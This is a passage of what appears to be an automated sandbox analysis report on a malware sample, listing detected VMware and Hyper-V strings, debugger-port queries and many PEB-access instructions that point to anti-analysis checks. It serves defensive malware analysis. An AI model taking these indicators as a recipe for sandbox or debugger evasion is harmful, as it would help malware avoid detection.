          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.669248247.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.665465411.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.673364825.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_6FD710A0 mov eax, dword ptr fs:[00000030h]0_2_6FD710A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]1_2_00A590AF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A4F0BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]1_2_00A4F0BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]1_2_00A19080
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]1_2_00A93884
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]1_2_00A158EC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]1_2_00A2B02A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]1_2_00AE4015
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]1_2_00A97016
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]1_2_00AE1074
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]1_2_00AD2073
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]1_2_00A30050
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]1_2_00A461A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]1_2_00A969A6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]1_2_00A951BE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]1_2_00A4A185
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]1_2_00A3C182
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]1_2_00A42990
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A1B1E1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]1_2_00AA41E8
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov ecx, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]1_2_00A4513A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]1_2_00A19100
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]1_2_00A1C962
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]1_2_00A1B171
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]1_2_00A3B944
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A2AAB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A4FAB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]1_2_00A4D294
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]1_2_00A42AE4
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]1_2_00A42ACB
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]1_2_00A54A2C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]1_2_00A28A0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov ecx, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]1_2_00A1AA16
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]1_2_00A1AA16
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]1_2_00A33A1C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]1_2_00ACB260
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]1_2_00ACB260
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]1_2_00AE8A62
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]1_2_00A5927A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]1_2_00ADEA55
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]1_2_00AA4257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AE5BA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]1_2_00AD138A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]1_2_00ACD380
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]1_2_00A21B8F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]1_2_00A21B8F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]1_2_00A42397
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]1_2_00A4B390
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A3DBE9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]1_2_00A953CA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]1_2_00A953CA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]1_2_00AD131B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A1DB60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]1_2_00A43B7A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]1_2_00A43B7A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]1_2_00A1DB40
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]1_2_00AE8B58
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]1_2_00A1F358
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]1_2_00A2849B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]1_2_00AD14FB
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AE8CD6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]1_2_00A4BC2C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]1_2_00A3746D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]1_2_00A4A44B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]1_2_00AAC450
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]1_2_00AAC450
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]1_2_00AE05AC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]1_2_00AE05AC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]1_2_00A435A1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]1_2_00A4FD9B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]1_2_00A4FD9B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AC8DF1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]1_2_00A1AD30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]1_2_00ADE539
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]1_2_00AE8D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]1_2_00A9A537
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]1_2_00A3C577
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]1_2_00A3C577
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]1_2_00A53D43
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]1_2_00A93540
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]1_2_00A37D50
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]1_2_00A946A7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]1_2_00AAFE87
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]1_2_00A276E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]1_2_00A416E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]1_2_00A58EC7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]1_2_00A436CC
